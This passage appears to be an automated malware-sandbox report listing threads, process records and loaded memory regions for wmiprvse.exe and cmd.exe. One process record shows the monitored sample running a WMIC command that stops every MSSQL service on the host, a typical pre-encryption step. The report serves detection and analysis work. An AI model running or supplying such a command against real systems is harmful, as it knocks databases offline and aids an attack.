os_tid = 0x6b4 Thread: id = 90 os_tid = 0x694 Thread: id = 91 os_tid = 0x680 Thread: id = 92 os_tid = 0x664 Thread: id = 93 os_tid = 0x650 Thread: id = 94 os_tid = 0x64c Thread: id = 95 os_tid = 0x630 Thread: id = 96 os_tid = 0x628 Thread: id = 97 os_tid = 0x5f8 Thread: id = 98 os_tid = 0x5e4 Thread: id = 99 os_tid = 0x5cc Thread: id = 100 os_tid = 0x5c4 Thread: id = 101 os_tid = 0x574 Thread: id = 102 os_tid = 0x558 Thread: id = 103 os_tid = 0x530 Thread: id = 104 os_tid = 0x4dc Thread: id = 105 os_tid = 0x414 Thread: id = 106 os_tid = 0x118 Thread: id = 107 os_tid = 0xfc Thread: id = 108 os_tid = 0x140 Thread: id = 109 os_tid = 0x1a0 Thread: id = 110 os_tid = 0x14c Thread: id = 111 os_tid = 0x154 Thread: id = 112 os_tid = 0x130 Thread: id = 113 os_tid = 0x160 Thread: id = 114 os_tid = 0xf8 Thread: id = 115 os_tid = 0x3dc Thread: id = 116 os_tid = 0x3d8 Thread: id = 117 os_tid = 0x3d0 Thread: id = 118 os_tid = 0x3cc Thread: id = 119 os_tid = 0x3c8 Thread: id = 120 os_tid = 0x37c Thread: id = 159 os_tid = 0x350 Thread: id = 163 os_tid = 0xce0 Thread: id = 164 os_tid = 0xce4 Thread: id = 165 os_tid = 0xce8 Thread: id = 166 os_tid = 0xcec Thread: id = 167 os_tid = 0xcf0 Thread: id = 168 os_tid = 0xcf4 Thread: id = 169 os_tid = 0xcf8 Thread: id = 170 os_tid = 0xcfc Thread: id = 209 os_tid = 0xe00 Thread: id = 210 os_tid = 0xe04 Thread: id = 299 os_tid = 0x4d0 Thread: id = 300 os_tid = 0xb58 Thread: id = 327 os_tid = 0xc70 Thread: id = 634 os_tid = 0xf04 Thread: id = 771 os_tid = 0xd6c Thread: id = 1050 os_tid = 0xdcc Thread: id = 1051 os_tid = 0xd54 Thread: id = 1052 os_tid = 0xda4 Thread: id = 1053 os_tid = 0xda0 Thread: id = 1054 os_tid = 0xd64 Thread: id = 1055 os_tid = 0xd7c Thread: id = 1056 os_tid = 0xdb4 Thread: id = 1057 os_tid = 0xd60 Thread: id = 1058 os_tid = 0xd74 Thread: id = 1059 os_tid = 0xd68 Thread: id = 1060 os_tid = 0xcb0 Thread: id = 1061 os_tid = 0xd88 Thread: id = 1062 os_tid = 0xd34 Thread: id = 1063 os_tid = 0xdf0 Thread: id = 1384 os_tid = 0x718 Thread: id = 1385 os_tid = 0x9c8 Thread: id = 1388 os_tid = 0xb00 Thread: id = 1389 os_tid = 0x354 Thread: id = 1390 os_tid = 0xe08 Thread: id = 1391 os_tid = 0xe0c Process: id = "21" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x8760000" os_pid = "0x774" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0x378" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00074ad1" [0xc000000f] Region: id = 1386 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1387 start_va = 0x449e5d0000 end_va = 0x449e5effff entry_point = 0x0 region_type = private name = "private_0x000000449e5d0000" filename = "" Region: id = 1388 start_va = 0x449e5f0000 end_va = 0x449e603fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000449e5f0000" filename = "" Region: id = 1389 start_va = 0x449e610000 end_va = 0x449e68ffff entry_point = 0x0 region_type = private name = "private_0x000000449e610000" filename = "" Region: id = 1390 start_va = 0x449e690000 end_va = 0x449e693fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000449e690000" filename = "" Region: id = 1391 start_va = 0x449e6a0000 end_va = 0x449e6a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000449e6a0000" filename = "" Region: id = 1392 start_va = 0x449e6b0000 end_va = 0x449e6b1fff entry_point = 0x0 region_type = private name = "private_0x000000449e6b0000" filename = "" Region: id = 1393 start_va = 0x7df5ffcc0000 end_va = 0x7ff5ffcbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffcc0000" filename = "" Region: id = 1394 start_va = 0x7ff75c2e0000 end_va = 0x7ff75c302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff75c2e0000" filename = "" Region: id = 1395 start_va = 0x7ff75c307000 end_va = 0x7ff75c307fff entry_point = 0x0 region_type = private name = "private_0x00007ff75c307000" filename = "" Region: id = 1396 start_va = 0x7ff75c30e000 end_va = 0x7ff75c30ffff entry_point = 0x0 region_type = private name = "private_0x00007ff75c30e000" filename = "" Region: id = 1397 start_va = 0x7ff75cd80000 end_va = 0x7ff75cdfefff entry_point = 0x7ff75cd80000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1398 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1399 start_va = 0x449e820000 end_va = 0x449e91ffff entry_point = 0x0 region_type = private name = "private_0x000000449e820000" filename = "" Region: id = 1400 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1401 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1402 start_va = 0x449e5d0000 end_va = 0x449e5dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000449e5d0000" filename = "" Region: id = 1403 start_va = 0x449e5e0000 end_va = 0x449e5e6fff entry_point = 0x0 region_type = private name = "private_0x000000449e5e0000" filename = "" Region: id = 1404 start_va = 0x449e6c0000 end_va = 0x449e77dfff entry_point = 0x449e6c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1405 start_va = 0x449e780000 end_va = 0x449e7fffff entry_point = 0x0 region_type = private name = "private_0x000000449e780000" filename = "" Region: id = 1406 start_va = 0x7ff75c1e0000 end_va = 0x7ff75c2dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff75c1e0000" filename = "" Region: id = 1407 start_va = 0x7ff75c30c000 end_va = 0x7ff75c30dfff entry_point = 0x0 region_type = private name = "private_0x00007ff75c30c000" filename = "" Region: id = 1408 start_va = 0x7ffbf5fb0000 end_va = 0x7ffbf5fc5fff entry_point = 0x7ffbf5fb0000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1409 start_va = 0x7ffbf6170000 end_va = 0x7ffbf6267fff entry_point = 0x7ffbf6170000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1410 start_va = 0x7ffbfa160000 end_va = 0x7ffbfa1defff entry_point = 0x7ffbfa160000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1411 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1412 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1413 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1414 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1415 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1416 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1417 start_va = 0x449e800000 end_va = 0x449e806fff entry_point = 0x0 region_type = private name = "private_0x000000449e800000" filename = "" Region: id = 1418 start_va = 0x449e9c0000 end_va = 0x449e9cffff entry_point = 0x0 region_type = private name = "private_0x000000449e9c0000" filename = "" Region: id = 1419 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1420 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1421 start_va = 0x449e9d0000 end_va = 0x449ed06fff entry_point = 0x449e9d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1422 start_va = 0x449ed10000 end_va = 0x449ee97fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000449ed10000" filename = "" Region: id = 1423 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1424 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1425 start_va = 0x449e810000 end_va = 0x449e810fff entry_point = 0x0 region_type = private name = "private_0x000000449e810000" filename = "" Region: id = 1426 start_va = 0x449e920000 end_va = 0x449e920fff entry_point = 0x0 region_type = private name = "private_0x000000449e920000" filename = "" Region: id = 1427 start_va = 0x449e930000 end_va = 0x449e934fff entry_point = 0x449e930000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1428 start_va = 0x449eea0000 end_va = 0x449f020fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000449eea0000" filename = "" Region: id = 1429 start_va = 0x449f030000 end_va = 0x449f0effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000449f030000" filename = "" Region: id = 1430 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1431 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1432 start_va = 0x449e940000 end_va = 0x449e940fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000449e940000" filename = "" Region: id = 1433 start_va = 0x449e950000 end_va = 0x449e950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000449e950000" filename = "" Region: id = 1434 start_va = 0x449f0f0000 end_va = 0x449f16ffff entry_point = 0x0 region_type = private name = "private_0x000000449f0f0000" filename = "" Region: id = 1435 start_va = 0x449f170000 end_va = 0x449f26ffff entry_point = 0x0 region_type = private name = "private_0x000000449f170000" filename = "" Region: id = 1436 start_va = 0x7ff75c30a000 end_va = 0x7ff75c30bfff entry_point = 0x0 region_type = private name = "private_0x00007ff75c30a000" filename = "" Region: id = 1437 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1438 start_va = 0x449e960000 end_va = 0x449e960fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000449e960000" filename = "" Region: id = 1439 start_va = 0x7ffbf64d0000 end_va = 0x7ffbf64e0fff entry_point = 0x7ffbf64d0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1440 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1441 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1442 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1443 start_va = 0x449f270000 end_va = 0x449f2effff entry_point = 0x0 region_type = private name = "private_0x000000449f270000" filename = "" Region: id = 1444 start_va = 0x449f2f0000 end_va = 0x449f36ffff entry_point = 0x0 region_type = private name = "private_0x000000449f2f0000" filename = "" Region: id = 1445 start_va = 0x449f370000 end_va = 0x449f3effff entry_point = 0x0 region_type = private name = "private_0x000000449f370000" filename = "" Region: id = 1446 start_va = 0x449f3f0000 end_va = 0x449f46ffff entry_point = 0x0 region_type = private name = "private_0x000000449f3f0000" filename = "" Region: id = 1447 start_va = 0x449f470000 end_va = 0x449f4effff entry_point = 0x0 region_type = private name = "private_0x000000449f470000" filename = "" Region: id = 1448 start_va = 0x7ff75c1dc000 end_va = 0x7ff75c1ddfff entry_point = 0x0 region_type = private name = "private_0x00007ff75c1dc000" filename = "" Region: id = 1449 start_va = 0x7ff75c1de000 end_va = 0x7ff75c1dffff entry_point = 0x0 region_type = private name = "private_0x00007ff75c1de000" filename = "" Region: id = 1450 start_va = 0x7ff75c303000 end_va = 0x7ff75c304fff entry_point = 0x0 region_type = private name = "private_0x00007ff75c303000" filename = "" Region: id = 1451 start_va = 0x7ff75c305000 end_va = 0x7ff75c306fff entry_point = 0x0 region_type = private name = "private_0x00007ff75c305000" filename = "" Region: id = 1452 start_va = 0x7ff75c308000 end_va = 0x7ff75c309fff entry_point = 0x0 region_type = private name = "private_0x00007ff75c308000" filename = "" Region: id = 1453 start_va = 0x7ffbf6120000 end_va = 0x7ffbf6144fff entry_point = 0x7ffbf6120000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1454 start_va = 0x7ffbf6150000 end_va = 0x7ffbf6163fff entry_point = 0x7ffbf6150000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1455 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1456 start_va = 0x7ffbeb2a0000 end_va = 0x7ffbeb46dfff entry_point = 0x7ffbeb2a0000 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 1457 start_va = 0x7ffbebb10000 end_va = 0x7ffbebb5dfff entry_point = 0x7ffbebb10000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1458 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1459 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1460 start_va = 0x449e970000 end_va = 0x449e971fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000449e970000" filename = "" Region: id = 1461 start_va = 0x449e980000 end_va = 0x449e98afff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000449e980000" filename = "" Region: id = 1462 start_va = 0x449f4f0000 end_va = 0x449f56ffff entry_point = 0x0 region_type = private name = "private_0x000000449f4f0000" filename = "" Region: id = 1463 start_va = 0x449f570000 end_va = 0x449f66ffff entry_point = 0x0 region_type = private name = "private_0x000000449f570000" filename = "" Region: id = 1464 start_va = 0x449f670000 end_va = 0x449f6effff entry_point = 0x0 region_type = private name = "private_0x000000449f670000" filename = "" Region: id = 1465 start_va = 0x7ff75c1d8000 end_va = 0x7ff75c1d9fff entry_point = 0x0 region_type = private name = "private_0x00007ff75c1d8000" filename = "" Region: id = 1466 start_va = 0x7ff75c1da000 end_va = 0x7ff75c1dbfff entry_point = 0x0 region_type = private name = "private_0x00007ff75c1da000" filename = "" Region: id = 1467 start_va = 0x7ffbebad0000 end_va = 0x7ffbebb0bfff entry_point = 0x7ffbebad0000 region_type = mapped_file name = "tscfgwmi.dll" filename = "\\Windows\\System32\\tscfgwmi.dll" (normalized: "c:\\windows\\system32\\tscfgwmi.dll") Region: id = 1468 start_va = 0x7ffbf29e0000 end_va = 0x7ffbf29ebfff entry_point = 0x7ffbf29e0000 region_type = mapped_file name = "dsparse.dll" filename = "\\Windows\\System32\\dsparse.dll" (normalized: "c:\\windows\\system32\\dsparse.dll") Region: id = 1469 start_va = 0x7ffbfdc10000 end_va = 0x7ffbfdc19fff entry_point = 0x7ffbfdc10000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1470 start_va = 0x7ffbfde90000 end_va = 0x7ffbfdeaefff entry_point = 0x7ffbfde90000 region_type = mapped_file name = "regapi.dll" filename = "\\Windows\\System32\\regapi.dll" (normalized: "c:\\windows\\system32\\regapi.dll") Region: id = 1471 start_va = 0x7ffbfe0d0000 end_va = 0x7ffbfe0dafff entry_point = 0x7ffbfe0d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1472 start_va = 0x7ffbfe0f0000 end_va = 0x7ffbfe127fff entry_point = 0x7ffbfe0f0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1473 start_va = 0x7ffbffd20000 end_va = 0x7ffbffd77fff entry_point = 0x7ffbffd20000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1474 start_va = 0x7ffc00370000 end_va = 0x7ffc003a5fff entry_point = 0x7ffc00370000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1475 start_va = 0x7ffc003b0000 end_va = 0x7ffc003d5fff entry_point = 0x7ffc003b0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1476 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1477 start_va = 0x7ffc00920000 end_va = 0x7ffc00930fff entry_point = 0x7ffc00920000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1478 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1479 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1480 start_va = 0x7ffc01190000 end_va = 0x7ffc01350fff entry_point = 0x7ffc01190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1481 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1482 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1483 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1484 start_va = 0x7ffbebab0000 end_va = 0x7ffbebac3fff entry_point = 0x7ffbebab0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1485 start_va = 0x7ffbecf30000 end_va = 0x7ffbecf47fff entry_point = 0x7ffbecf30000 region_type = mapped_file name = "utildll.dll" filename = "\\Windows\\System32\\utildll.dll" (normalized: "c:\\windows\\system32\\utildll.dll") Region: id = 1486 start_va = 0x7ffbf23e0000 end_va = 0x7ffbf23f7fff entry_point = 0x7ffbf23e0000 region_type = mapped_file name = "cfgbkend.dll" filename = "\\Windows\\System32\\cfgbkend.dll" (normalized: "c:\\windows\\system32\\cfgbkend.dll") Region: id = 1487 start_va = 0x7ffbfcde0000 end_va = 0x7ffbfcdf7fff entry_point = 0x7ffbfcde0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1488 start_va = 0x7ffbffaf0000 end_va = 0x7ffbffafbfff entry_point = 0x7ffbffaf0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1489 start_va = 0x7ffbffb00000 end_va = 0x7ffbffb25fff entry_point = 0x7ffbffb00000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1490 start_va = 0x7ffbffed0000 end_va = 0x7ffbfff0dfff entry_point = 0x7ffbffed0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1491 start_va = 0x7ffc00f70000 end_va = 0x7ffc00fb3fff entry_point = 0x7ffc00f70000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1492 start_va = 0x7ffc01b20000 end_va = 0x7ffc01ce4fff entry_point = 0x7ffc01b20000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1493 start_va = 0x7ffbf29d0000 end_va = 0x7ffbf29d6fff entry_point = 0x7ffbf29d0000 region_type = mapped_file name = "rdpcfgex.dll" filename = "\\Windows\\System32\\rdpcfgex.dll" (normalized: "c:\\windows\\system32\\rdpcfgex.dll") Region: id = 1494 start_va = 0x7ffbfcfc0000 end_va = 0x7ffbfcfd5fff entry_point = 0x7ffbfcfc0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1495 start_va = 0x7ffbfcfa0000 end_va = 0x7ffbfcfb9fff entry_point = 0x7ffbfcfa0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1496 start_va = 0x7ffc00110000 end_va = 0x7ffc0016cfff entry_point = 0x7ffc00110000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1497 start_va = 0x7ffbfff10000 end_va = 0x7ffbfffb7fff entry_point = 0x7ffbfff10000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1498 start_va = 0x7ffbf9f50000 end_va = 0x7ffbf9f59fff entry_point = 0x7ffbf9f50000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1499 start_va = 0x7ffbfced0000 end_va = 0x7ffbfcf37fff entry_point = 0x7ffbfced0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Thread: id = 121 os_tid = 0x838 Thread: id = 122 os_tid = 0x3c0 Thread: id = 123 os_tid = 0x670 Thread: id = 124 os_tid = 0x67c Thread: id = 125 os_tid = 0x5d8 Thread: id = 126 os_tid = 0x438 Thread: id = 127 os_tid = 0xc04 Thread: id = 128 os_tid = 0xc08 Thread: id = 129 os_tid = 0xc10 Thread: id = 130 os_tid = 0xc14 Thread: id = 131 os_tid = 0xc28 Thread: id = 191 os_tid = 0xd98 Thread: id = 202 os_tid = 0xdd8 Process: id = "22" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x939d000" os_pid = "0xc2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1500 start_va = 0x380000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1501 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1502 start_va = 0x3b0000 end_va = 0x3b3fff entry_point = 0x0 region_type = pagefile_backed name 